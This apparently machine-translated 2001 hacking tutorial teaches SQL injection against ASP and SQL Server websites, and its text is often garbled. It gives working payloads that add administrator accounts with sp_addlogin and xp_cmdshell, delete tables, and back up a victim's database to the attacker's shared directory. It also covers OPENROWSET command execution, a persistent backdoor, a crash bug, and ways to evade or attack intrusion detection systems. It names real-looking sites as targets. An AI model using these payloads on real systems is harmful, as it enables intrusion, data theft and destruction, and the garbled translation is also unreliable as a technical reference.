Simple invasion and rogue damage to the database, do an example with the sky
For many news, BBS and e-commerce websites use ASP SQL design, and there are many programmers who write ASP (there are many graduates), so ASP SQL's attack success rate is also relatively high. This type of attack method and NT version and SQL version have no big relationship, and there is no corresponding patch because the vulnerability is caused by the programmer, and most of the books of the ASP programming, the source code example has this vulnerability In fact, it is only some legal ASP's request for SQL, and then there is endless suffering! This attack method is the earliest of 'or'1' = '1 vulnerability (we temporarily call it a vulnerability), this vulnerability I think I think Everyone should know, then the way is that EXECSP_ADDLogin Hax (add a HAX user in the database), but this method is limited, the first SQL Server account used by the ASP is an administrator, followed by the request Submit the variable in the end of the entire SQL statement, because some programmers use Select * from news where id = ... and Topic = ... and ..... method requests the database, then if still used the above example Will News.asp? Id = 2; exec sp_addlogin HAX becomes Select * from news where id = 2; exec sp_addlogin Hax and Topic = ... and ...
After the SQL statement is executing sp_addlogin's stored procedure, there is AND and judgment, syntax errors, your sp_addlogin naturally does not work normally, so try to see the following method news.asp? Id = 2; exec sp_addlogin Hax; - Back - The symbol turns the judgment statement after sp_addlogin to comment, so there is no syntax error, sp_addlogin is executed normally! So let's use the news.asp? Id = 2; exec master.dbo.sp_addlogin hax; - news.asp? Id = 2; exec master.dbo.sp_password null, Hax, Hax; - News.asp ? id = 2; exec master.dbo.sp_addsrvrolemember sysadmin Hax; - news.asp? id = 2; exec master.dbo.xp_cmdshell 'net user Hax / Workstations: * / Times: all / passwordchg: Yes / PasswordReq: YES / ACTIVE: YES / Add '; - news.asp? id = 2; exec master.dbo.xp_cmdshell' net localgroup administrators Hax / add '; - this left HAX in his database and system Of course, the administrator account is of course, the ASP is an administrator account, so the virtual space is not tried, and this vulnerability will not exist. We will discuss later, if the other party's ASP does not use the SQL administrator account, we invaded, of course, the invasion of the 1433 port will of course, you can try to look at the ID = 2, then add a 'symbol, mainly watching the other's ASP How to write
Let's talk about how we do when the SQL account used by the ASP program is not administrator. You are as the homepage of Heaven, there is news content, as follows: http://www.talent.com.cn/news/news-2.asp?newid=117 you can try to see http://www.talentitit.com .cn / news / news-2.asp? newid = 117; select 123; - Oh, report syntax error, SELECT 123 error, obvious, Tianchong new ASP will be used after the newID variable, then look at HTTP: //www.talentitit.com.cn/news/news-2.asp?newid=117'; Delete News; - Haha, I think as long as the name is guess, the news bank is deleted SQL used by ASP. If the account is not an administrator, it will be an Owner of a database. At least for this library has high management privileges but we don't know how the library is? Take a look at the db_name () function Open your query analyzer, take a look at Print DB_Name (), huh, the current database name comes out with subclass, as follows: declare @a sysname; set @ a = db_name (); Backup Database @A to disk = 'Your IP Your Shared Directory Bak.dat', Name = 'Test'; - Oh, his current database back up to your hard drive, you have to do everything you have to do. Let's find the other's SQL IP first firewall, open ICMP and 139TCP and 445TCP warning tips and try to see news.asp? Id = 2; exec master.dbo.xp_cmdshell 'ping your ip' If the firewall prompts someone ping you, then it can be sure the other ASP is SQL administrator privilege, and it also determines the exact location of the other SQL Server, because many of the big websites consider performance, WEB services and The database is separated. When the other party does not see the source code, I think there is only this method to locate the other side's SQL Server position, if the other party ASP does not have SQL administrator privileges, we can't call xp_cmdshell ,What should I do? Don't worry, try this news.asp? Id = 2; declare @a; set @ a = db_name (); backup database @a to disk = 'your IP Your shared directory Bak.dat', Name = 'TEST '; - huh, your firewall should make a warning, some people connect your 445 or 139 (Win9 port, so that the other's SQL IP can also expose if the other party is not Owner oer, What should we do? Next time I will tell you a better way. In fact, Backuo Database to your hard drive is still a bit exaggerated. If the other database is very large, you are dialing Internet, huh, huh, advise you not try, very Next, we will talk about how to deceive IDS to perform ASP SQL invasion, there are some good ids that have begun to monitor XP_cmdshell, the comrades next time.
All or more URLs I hope that you will submit through VBScript because the browser's address bar will block some special characters so that your command cannot be fully transmitted. Just some simple XP_cmdshell calls limit is large, in fact, there are many places worth in-depth, such as www.guosen.com.cn. There is this problem with the national agency certificate, and they use the three-story structure of the MS to use the XP_cmdshell approach to the previous XP_cmdshell, and the string will be filtered, but I tried, the use of SQL's heterogeneous requests can still be on the other. Machine Open the account of Telnet service and administrators group! Since the other firewall is very close CheckPoint Datasters, only open 80 ports, there is therefore difficult to get his database structure, but there is still a way to do: p By the way reminds everyone to pay attention to SQLOLEDB, DB_NAME, OpenRowSet, OpenDataSource These system functions When the ASP's SQL Server account is just a normal user, they will be useful!
SQL Server new vulnerabilities and some breakthroughs
Below I will talk about some sqlserver new bugs, although I have been working hard, of course, I have a little lucky component, I have to find it, I don't dare to enjoy alone, please come out, please identify, of course, it is likely some The master has already known, after all, I have been in contact with SQL Server for less than 1 year:
1. About OpenRowSet and OpenDataSource may have already a skill, which is to send local commands using OpenRowSet usually our usage is (including MSDN's list) as follows Select * from OpenrowSet ('SQLOLDB', 'MyServer'; 'sa'; ';' , 'select * from table') visible (even from the literal meaning) OpenRowset just as a fast remote database access, it must be followed in Select, that is, what we need to return a recordset, then we can use it to call XP_cmdshell? ? The answer is yes! Select * from openrowset ('sqloledb', 'server'; 'sa'; '', 'set fmtonly off exec master.dbo.xp_cmdshell' 'DIR C: /' ') must be added to SET FMTONLY OFF to block the default Only return to the settings of the column information, so the output collection returned by XP_cmdshell will be submitted to the front Select display. If the default setting is used, the empty set will return the select error, and the command will not be executed. Then if we want to call sp_addlogin, he will not return any collection like XP_cmdshell, we can't rely on FMTONLY, you can do the SELECT * from OpenRowSet ('SQLOLEDB', 'Server'; 'SA', '', 'select' 'OK!' 'exec master.dbo.sp_addlogin hectic') This will return at least the collection of select 'ok!', your machine chamber shows OK! and the other's database will also add a hectic The account, that is, we use Select 'OK!' To deceive the local SELECT request, is the command can be executed normally, and the pendant sp_addsrvrolemember and OpenDataSource can also do this! As for the real use of this method, everyone slowly thinks: P
2. Regarding the question of MSDASQL twice, I don't know if you have tried the MSDasql connection remote database. Of course, this API must be administrators of SQL Server to call, so as the following Select * from OpenrowSet ('msdasql', 'driver = {SQL
Server}; server = server; address = server, 1433; uid = sa; pwd =; database = master; network = dbmssocn ',' SELECT * from Table1 SELECT * FROM
Table2 ') When the number of fields of table1 and table2 is not the same, you will find that the other's SQL Server crashes, and even local connections will fail, and system resources are occupied. After killing the SQL Server process with pskill, if not restarting the machine, SQLServer Even if you can't start normally, I often have illegal operations, I just happen to find this bug, I haven't touched it in the specific reason, and it is very strange that this phenomenon only appears on MSDasql, Sqloledb has no such problem, it seems problem Not in the request of the number of collections and the number of returns to the collections, but the problem of MSDasql itself, the specific reason, everyone will study together: P3. The terrible back door has seen someone on the Internet. Some people say that after SQL Server can do it by adding Triger, Jobs, or rewriting sp_addlogin and sp_addsrvroleMember, these methods are of course feasible, but it is easy to be discovered. I don't know if you have thought about the local connection map of SQLOLOLDB. Oh, such as your administrator account in the other party with SQLServer, executive Select * from openrowset ('sqloledb', 'trusted_connection = yes; data source = hectic ",' set fmtonly off exec master..xp_cmdshell
'' DIR C: / '' ') This created a local connection map named hectic on the other party's SQL Server, as long as SQLServer does not restart, this map will always exist, at least I don't know how to find someone else. After the connection map, ok, after the above command runs, you will find that even the guest user without any permissions, running the above command can also pass! And the permissions are Localsystem! (Default installation) huh! This method can be used to leave a rear door in SQL Server that is invaded by the administrator privilege.
The above method passes on SQL Server2000 SQLServer 200SP1!
* There is another guess. I don't know if you haven't pay more attention to the two DSNs included with Windows. One is the LocalServer one is MSQi. These two are the local administrator account connection SQLServer, if the other party's SQL Server is By starting with custom Power User, then the permissions of SA are the same as Power User, it is difficult to make a big, but we pass select * from openrowset ('msdasql', 'dsn = locaserver; trusted_connection = yes', 'set fmtonly off exec master..xp_cmdshell' 'DIR
C: / '') should be able to connect to local SQLServer using local SQLServer and then execute local commands with this account, which I would like to break through the SA That Power User authority. The current problem is that SQLOLEDB cannot call the DSN connection, and the MSDasql non-administrator does not let the call, so I am looking for the method of guest call MSDasql. If someone knows how this bug breaks through, or there is a new idea, we can discuss it together, This distribution can be used in successful use of Guest, it will be a very serious security vulnerability. Because any SQL statement mentioned earlier can be submitted to the other party's ASP to help us execute: P Use T-SQL to deceive IDS or attack IDS
The current IDS has become more and more smart, Ids joined XP_cmdshell sp_addlogin's monitoring, but after all, artificial intelligence did not appear today, this surveillance always has a sense of deception, first talking about deception IDS: IDS Since the surveillance XP_cmdshell Keyword, then we can do this declare @a sysname set @ a = "xp _" "cmdshell" EXEC @a 'Dir C: /' This code is like everyone can understand, and XP_cmdshell as a Store Procedure There is an ID number in the Master library, fixed, we can also assume this id = 988456 declare @a sysname select @ a = Name from sysobjects where id = 988456 exec @a 'Dir C: /' Of course you can also declare @ a sysname select @ a = name from sysobjects where id = 988455 1 exec @a 'DIR C: /' This practice is arranged, IDS is not possible to do it, sp_addlogin can also talk about attacks. IDS: Because the IDS data is large, day is usually backed up to regular databases, such as SQL Server If the ancient RecordSet.Addnew is practiced, it will seriously affect the performance of IDS, because T-SQL requests are made through ADO, not only high efficiency, but also Some work can be handed over to SQL Server
Going to doing usually written in Insert Table VALUES ('Day to Content', ...) So I think, if you use Temp ') Exec XP_cmdshell' Dir C: / '- submit into Insert Table VALUES ('Day to Content' .... 'Temp') Exec XP_cmdshell 'DIR C: /' - ') This, XP_cmdshell can run in the IDS database :) Of course Ids is a sober, he will Care all the news, while the browser is submitted, the space will turn the space into% 20 Therefore,% 20 will be submitted to SQL Server so your command cannot perform the only way is INSERT / ** / TABLE / ** / VALUES ('Day to Content' .... 'Temp') / ** / EXEC / ** / XP_CMDSHELL / ** / 'DIR C: /' / ** / - ') Use / ** / instead Space is intermittent, so your T-SQL can perform it in the IDS's database, you can use other statements, you can destroy, back up the IDS database to your shared directory. The principle and attack ASP is the same. , Just turn the space into / ** / original ASP is a SELECT statement, then use 'to block the IdS Now Ids is in the insert statement, then use') shielded, and many other new invasive statements can slowly think about it. The best test tool is Query Analyzer. Published: August 24, 2001 17
